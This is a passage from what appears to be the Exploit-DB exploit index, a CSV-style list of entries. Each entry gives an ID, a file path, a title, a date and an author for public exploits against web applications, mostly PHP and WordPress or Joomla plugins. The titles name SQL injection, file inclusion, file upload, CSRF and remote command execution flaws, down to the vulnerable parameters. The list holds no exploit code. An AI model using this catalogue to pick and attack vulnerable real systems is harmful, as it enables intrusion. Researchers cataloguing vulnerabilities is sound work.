'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",webapps,php, +38938,exploits/php/webapps/38938.txt,"xBoard 5.0/5.5/6.0 - 'view.php' Local File Inclusion",2013-12-24,"TUNISIAN CYBER",webapps,php, +38941,exploits/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,webapps,php, +38942,exploits/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall - Directory Traversal",2013-10-03,"Sisco Barrera",webapps,php, +38943,exploits/php/webapps/38943.txt,"Joomla! Component com_aclsfgpl - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",webapps,php, +38944,exploits/php/webapps/38944.txt,"Command School Student Management System - '/sw/admin_grades.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38945,exploits/php/webapps/38945.txt,"Command School Student Management System - '/sw/admin_terms.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38946,exploits/php/webapps/38946.txt,"Command School Student Management System - '/sw/admin_school_years.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38947,exploits/php/webapps/38947.txt,"Command School Student Management System - '/sw/admin_sgrades.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38948,exploits/php/webapps/38948.txt,"Command School Student Management System - '/sw/admin_media_codes_1.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38949,exploits/php/webapps/38949.txt,"Command School Student Management System - '/sw/admin_infraction_codes.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38950,exploits/php/webapps/38950.txt,"Command School Student Management System - '/sw/admin_generations.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38951,exploits/php/webapps/38951.txt,"Command School Student Management System - '/sw/admin_relations.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38952,exploits/php/webapps/38952.txt,"Command School Student Management System - '/sw/admin_titles.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38953,exploits/php/webapps/38953.txt,"Command School Student Management System - '/sw/health_allergies.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38954,exploits/php/webapps/38954.txt,"Command School Student Management System - '/sw/admin_school_names.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38955,exploits/php/webapps/38955.txt,"Command School Student Management System - '/sw/admin_subjects.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38956,exploits/php/webapps/38956.txt,"Command School Student Management System - '/sw/backup/backup_ray2.php' Database Backup Direct Request Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38957,exploits/php/webapps/38957.html,"Command School Student Management System - '/sw/Admin_change_Password.php' Cross-Site Request Forgery (Admin Password Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38958,exploits/php/webapps/38958.html,"Command School Student Management System - '/sw/add_topic.php' Cross-Site Request Forgery (Topic Creation)",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38965,exploits/php/webapps/38965.txt,"ECommerceMajor - 'productdtl.php?prodid' SQL Injection",2015-12-14,"Rahul Pratap Singh",webapps,php,80 +38966,exploits/php/webapps/38966.txt,"WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",webapps,php,80 +39096,exploits/php/webapps/39096.txt,"i-doit Pro - 'objID' SQL Injection",2014-02-17,"Stephan Rickauer",webapps,php, +39098,exploits/php/webapps/39098.txt,"Joomla! Component com_wire_immogest - 'index.php' SQL Injection",2014-02-17,MR.XpR,webapps,php, +39057,exploits/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injections",2014-01-13,"Rohan Stelling",webapps,php, +38971,exploits/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Directory Traversal",2015-12-14,"Jake Reynolds",webapps,hardware,80 +38975,exploits/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",webapps,php,80 +38976,exploits/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",webapps,php,80 +38977,exploits/php/webapps/38977.py,"Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,webapps,php, +38981,exploits/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,webapps,php,80 +38984,exploits/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",webapps,php,80 +38985,exploits/php/webapps/38985.txt,"Dredge School Administration System - '/DSM/loader.php?Id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38986,exploits/php/webapps/38986.txt,"Dredge School Administration System - '/DSM/loader.php' Account Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38987,exploits/php/webapps/38987.html,"Dredge School Administration System - '/DSM/loader.php' Cross-Site Request Forgery (Admin Account Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38988,exploits/php/webapps/38988.txt,"Dredge School Administration System - '/DSM/Backup/processbackup.php' Database Backup Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,webapps,php, +38989,exploits/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusions",2015-12-15,bd0rk,webapps,php,80 +38991,exploits/php/webapps/38991.pl,"Ovidentia NewsLetter Module 2.2 - 'admin.php' Remote File Inclusion",2015-12-16,bd0rk,webapps,php,80 +39011,exploits/php/webapps/39011.txt,"UAEPD Shopping Script - 'products.php' Multiple SQL Injections",2014-01-08,AtT4CKxT3rR0r1ST,webapps,php, +39012,exploits/php/webapps/39012.txt,"UAEPD Shopping Script - 'news.php?id' SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,webapps,php, +39013,exploits/php/webapps/39013.html,"Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)",2014-01-08,AtT4CKxT3rR0r1ST,webapps,php, +39014,exploits/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,AtT4CKxT3rR0r1ST,webapps,php, +39015,exploits/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",webapps,php, +39016,exploits/php/webapps/39016.txt,"Joomla! Component Almond Classifieds - Arbitrary File Upload",2014-01-10,DevilScreaM,webapps,php, +39017,exploits/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",webapps,php,80 +39028,exploits/php/webapps/39028.txt,"Joomla! Component Sexy polling 1.0.8 - 'answer_id' SQL Injection",2014-01-16,"High-Tech Bridge",webapps,php, +39029,exploits/php/webapps/39029.txt,"BloofoxCMS - '/bloofox/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php, +39030,exploits/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php, +39031,exploits/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php, +39032,exploits/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,webapps,php, +39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",webapps,php,80 +39034,exploits/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,webapps,php,80 +39099,exploits/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,webapps,php, +39038,exploits/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,webapps,php, +39058,exploits/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",webapps,php, +39059,exploits/php/webapps/39059.txt,"WordPress Plugin Global Flash Gallery - 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",webapps,php, +39060,exploits/php/webapps/39060.txt,"XOS Shop - 'goto' SQL Injection",2014-01-24,JoKeR_StEx,webapps,php, +39062,exploits/php/webapps/39062.txt,"ZenPhoto - SQL Injection",2014-01-24,KedAns-Dz,webapps,php, +39063,exploits/php/webapps/39063.txt,"WordPress Plugin WP E-Commerce - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,webapps,php, +39064,exploits/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,webapps,php, +39065,exploits/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",webapps,php, +39066,exploits/php/webapps/39066.txt,"Eventum 2.3.4 - 'hostname' Remote Code Execution",2014-01-28,"High-Tech Bridge",webapps,php, +39068,exploits/php/webapps/39068.txt,"Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion",2015-12-21,bd0rk,webapps,php, +39069,exploits/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,webapps,php,80 +39078,exploits/php/webapps/39078.txt,"Web Video Streamer - Multiple Vulnerabilities",2014-01-22,"Eric Sesterhenn",webapps,php, +39079,exploits/php/webapps/39079.txt,"Atmail WebMail - Message Attachment File Name Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",webapps,php, +39080,exploits/php/webapps/39080.txt,"Atmail WebMail - 'searchResultsTab5?filter' Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",webapps,php, +39081,exploits/php/webapps/39081.txt,"Atmail WebMail - 'INBOX.Trash?mailId' Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",webapps,php, +39083,exploits/php/webapps/39083.txt,"Bigware Shop 2.3.01 - Multiple Local File Inclusions",2015-12-23,bd0rk,webapps,php,80 +39084,exploits/php/webapps/39084.txt,"Grawlix 1.0.3 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",webapps,php,80 +39085,exploits/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",webapps,php,80 +39086,exploits/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",webapps,php,80 +39087,exploits/php/webapps/39087.txt,"Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",webapps,php, +39088,exploits/php/webapps/39088.txt,"Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",webapps,php, +39090,exploits/php/webapps/39090.php,"WordPress Theme Kiddo - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",webapps,php, +39093,exploits/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",webapps,php,80 +39094,exploits/php/webapps/39094.txt,"Rips Scanner 0.5 - 'code.php' Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",webapps,php,80 +39100,exploits/php/webapps/39100.txt,"WordPress Plugin NextGEN Gallery - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",webapps,php, +39101,exploits/php/webapps/39101.php,"MODx Evogallery Module - 'Uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",webapps,php, +39106,exploits/asp/webapps/39106.txt,"eshtery CMS - 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,webapps,asp, +39107,exploits/php/webapps/39107.txt,"ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2014-02-22,HauntIT,webapps,php, +39108,exploits/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",webapps,php, +39109,exploits/php/webapps/39109.txt,"WordPress Plugin Relevanssi - 'category_name' SQL Injection",2014-03-04,anonymous,webapps,php, +39110,exploits/php/webapps/39110.txt,"Cory Jobs Search - 'cid' SQL Injection",2014-03-05,Slotleet,webapps,php, +39111,exploits/php/webapps/39111.php,"WordPress Plugin Premium Gallery Manager - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,webapps,php, +39113,exploits/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Multiple SQL Injections",2014-03-08,"Nawaf Alkeraithe",webapps,php, +39116,exploits/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections",2014-03-19,"Claepo Wang",webapps,php, +39117,exploits/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",webapps,php, +39118,exploits/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",webapps,php, +39124,exploits/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Local File Inclusion",2014-03-10,Dr.3v1l,webapps,php, +39126,exploits/php/webapps/39126.txt,"BigACE 2.7.5 - 'LANGUAGE' Directory Traversal",2014-03-19,"Hossein Hezami",webapps,php, +39127,exploits/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",webapps,cgi, +39128,exploits/php/webapps/39128.txt,"Jorjweb - 'id' SQL Injection",2014-02-21,"Vulnerability Laboratory",webapps,php, +39129,exploits/php/webapps/39129.txt,"qEngine 4.1.6/6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",webapps,php, +39130,exploits/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",webapps,cgi, +39131,exploits/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",webapps,cgi, +39133,exploits/php/webapps/39133.php,"WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",webapps,php,80 +39135,exploits/php/webapps/39135.php,"WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",webapps,php, +39136,exploits/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",webapps,php, +39137,exploits/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",webapps,cgi, +39139,exploits/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",webapps,php, +39140,exploits/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,webapps,php, +39141,exploits/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,webapps,php, +39142,exploits/jsp/webapps/39142.txt,"Xangati - '/servlet/MGConfigData' Multiple Directory Traversals",2014-04-14,"Jan Kadijk",webapps,jsp, +39143,exploits/jsp/webapps/39143.txt,"Xangati - '/servlet/Installer?file' Directory Traversal",2014-04-14,"Jan Kadijk",webapps,jsp, +39145,exploits/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",webapps,cgi, +39146,exploits/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",webapps,php, +39150,exploits/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",webapps,php, +42552,exploits/php/webapps/42552.txt,"Joomla! Component Bargain Product VM3 1.0 - 'product_id' SQL Injection",2017-08-24,"Ihsan Sencan",webapps,php, +42553,exploits/php/webapps/42553.txt,"Joomla! Component Price Alert 3.0.2 - 'product_id' SQL Injection",2017-08-24,"Ihsan Sencan",webapps,php, +42563,exploits/php/webapps/42563.txt,"Joomla! Component Photo Contest 1.0.2 - SQL Injection",2017-08-25,"Ihsan Sencan",webapps,php, +39153,exploits/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",webapps,php, +39156,exploits/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,webapps,cgi, +39157,exploits/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",webapps,php, +39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80 +39168,exploits/php/webapps/39168.txt,"Simple PHP Polling System - Multiple Vulnerabilities",2016-01-05,WICS,webapps,php,80 +39170,exploits/xml/webapps/39170.txt,"Atlassian Confluence 5.2/5.8.14/5.8.15 - Multiple Vulnerabilities",2016-01-05,"Sebastian Perez",webapps,xml, +39171,exploits/php/webapps/39171.txt,"PHPIPAM 1.1.010 - Multiple Vulnerabilities",2016-01-05,"Mickael Dorigny",webapps,php, +39172,exploits/php/webapps/39172.txt,"PrestaShop - 'getSimilarManufacturer.php?id_manufacturer' SQL Injection",2014-05-05,indoushka,webapps,php, +39173,exploits/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",webapps,php, +39174,exploits/php/webapps/39174.txt,"Caldera - '/costview2/printers.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",webapps,php, +39176,exploits/php/webapps/39176.html,"TOA - Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",webapps,php, +39178,exploits/php/webapps/39178.txt,"CMS Touch - 'pages.php?Page_ID' SQL Injection",2014-05-08,indoushka,webapps,php, +39179,exploits/php/webapps/39179.txt,"CMS Touch - 'news.php?News_ID' SQL Injection",2014-05-08,indoushka,webapps,php, +39184,exploits/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,webapps,hardware, +39187,exploits/asp/webapps/39187.txt,"CIS Manager - 'email' SQL Injection",2014-05-16,Edge,webapps,asp, +39188,exploits/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php, +39189,exploits/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php, +39190,exploits/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",webapps,php, +39191,exploits/php/webapps/39191.txt,"Clipperz Password Manager - '/backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",webapps,php, +39192,exploits/hardware/webapps/39192.rb,"D-Link DCS-931L - Arbitrary File Upload (Metasploit)",2016-01-07,Metasploit,webapps,hardware, +39193,exploits/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",webapps,java, +39197,exploits/php/webapps/39197.txt,"WordPress Plugin Booking System (Booking Calendar) - 'booking_form_id' SQL Injection",2014-05-21,maodun,webapps,php, +39198,exploits/php/webapps/39198.html,"User Cake - Cross-Site Request Forgery",2014-05-25,"Dolev Farhi",webapps,php, +39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python, +39200,exploits/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component - SQL Injection",2014-05-24,"ali ahmady",webapps,php, +39202,exploits/php/webapps/39202.txt,"WordPress Plugin WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",webapps,php, +39206,exploits/php/webapps/39206.txt,"webEdition CMS - 'we_fs.php' SQL Injection",2014-05-28,"RedTeam Pentesting GmbH",webapps,php, +39210,exploits/php/webapps/39210.txt,"Seo Panel - 'file' Directory Traversal",2014-05-15,"Eric Sesterhenn",webapps,php, +39211,exploits/php/webapps/39211.txt,"WordPress Theme Infocus - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",webapps,php, +39212,exploits/php/webapps/39212.txt,"WordPress Plugin JW Player for Flash & HTML5 Video - Cross-Site Request Forgery",2014-06-10,"Tom Adams",webapps,php, +39213,exploits/php/webapps/39213.txt,"WordPress Plugin Featured Comments - Cross-Site Request Forgery",2014-06-10,"Tom Adams",webapps,php, +39223,exploits/php/webapps/39223.txt,"ZeusCart - 'prodid' SQL Injection",2014-06-24,"Kenny Mathis",webapps,php, +39231,exploits/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",webapps,asp, +39234,exploits/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Command Execution",2016-01-14,@iamsecurity,webapps,php,80 +39235,exploits/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",webapps,multiple,9090 +39236,exploits/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",webapps,multiple, +39237,exploits/php/webapps/39237.txt,"WordPress Plugin NextGEN Gallery 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,webapps,php, +39238,exploits/php/webapps/39238.txt,"AtomCMS - SQL Injection / Arbitrary File Upload",2014-07-07,"Jagriti Sahu",webapps,php, +39239,exploits/php/webapps/39239.txt,"xClassified - 'ads.php' SQL Injection",2014-07-07,Lazmania61,webapps,php, +39240,exploits/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - '/wp-admin/admin.php' Multiple SQL Injections",2014-07-09,"Claudio Viviani",webapps,php, +39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,webapps,java,4848 +39243,exploits/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,webapps,php,80 +39245,exploits/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",webapps,php,80 +39246,exploits/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",webapps,php,80 +39250,exploits/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,webapps,php, +39251,exploits/php/webapps/39251.txt,"WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",webapps,php, +39252,exploits/php/webapps/39252.txt,"WordPress Plugin WP Rss Poster - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",webapps,php, +39253,exploits/php/webapps/39253.txt,"WordPress Plugin ENL NewsLetter - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",webapps,php, +39254,exploits/php/webapps/39254.html,"WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",webapps,php, +39255,exploits/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",webapps,php, +39256,exploits/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - '/charts/treemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",webapps,php, +39257,exploits/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - '/charts/zoomabletreemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",webapps,php, +39261,exploits/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,webapps,php,80 +39262,exploits/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,webapps,php,80 +39263,exploits/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery",2016-01-18,hyp3rlinx,webapps,php,80 +39266,exploits/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",webapps,php,443 +39267,exploits/php/webapps/39267.html,"Ilya Birman E2 - '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",webapps,php, +39268,exploits/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass",2014-07-23,"Seth Art",webapps,php, +39269,exploits/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' SQL Injection",2014-07-28,Amirh03in,webapps,php, +39270,exploits/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - 'options-general.php' Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",webapps,php, +39271,exploits/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",webapps,php, +39272,exploits/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",webapps,php, +39273,exploits/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Remote Code Execution",2014-07-28,"Govind Singh",webapps,php, +39279,exploits/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",webapps,php, +39280,exploits/php/webapps/39280.txt,"WordPress Plugin HDW Player - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",webapps,php, +39281,exploits/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,webapps,php, +39282,exploits/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - '/wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",webapps,php, +39283,exploits/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,webapps,php, +39287,exploits/php/webapps/39287.txt,"WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",webapps,php, +39288,exploits/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",webapps,multiple, +39289,exploits/php/webapps/39289.txt,"ArticleFR - 'id' SQL Injection",2014-08-20,"High-Tech Bridge",webapps,php, +39290,exploits/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,webapps,php, +39291,exploits/php/webapps/39291.txt,"WordPress Plugin KenBurner Slider - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,webapps,php, +39294,exploits/php/webapps/39294.txt,"Joomla! Component spidervideoplayer - 'theme' SQL Injection",2014-08-26,"Claudio Viviani",webapps,php, +39296,exploits/php/webapps/39296.txt,"WordPress Theme Urban City - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",webapps,php, +39297,exploits/php/webapps/39297.txt,"WordPress Theme Authentic - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",webapps,php, +39298,exploits/php/webapps/39298.txt,"WordPress Theme Epic - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",webapps,php, +39299,exploits/php/webapps/39299.txt,"WordPress Theme Antioch - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",webapps,php, +39300,exploits/php/webapps/39300.txt,"WordPress Plugin Spider Facebook - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",webapps,php, +39301,exploits/php/webapps/39301.html,"WordPress Plugin Ninja Forms 2.7.7 - Authentication Bypass",2014-09-08,Voxel@Night,webapps,php, +39302,exploits/php/webapps/39302.html,"WordPress Plugin WP to Twitter - Authentication Bypass",2014-09-08,Voxel@Night,webapps,php, +39303,exploits/php/webapps/39303.txt,"WordPress Plugin Xhanch My Twitter - Cross-Site Request Forgery",2014-09-08,Voxel@Night,webapps,php, +39304,exploits/php/webapps/39304.txt,"WordPress Plugin W3 Total Cache - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,webapps,php, +39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443 +39309,exploits/php/webapps/39309.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.23 - Unauthenticated SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",webapps,php,80 +39313,exploits/php/webapps/39313.txt,"Food Order Portal - 'admin_user_delete.php' Cross-Site Request Forgery",2014-09-12,KnocKout,webapps,php, +39317,exploits/php/webapps/39317.txt,"WordPress Plugin Wordfence Security - Multiple Vulnerabilities",2014-09-14,Voxel@Night,webapps,php, +39319,exploits/php/webapps/39319.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",webapps,php,80 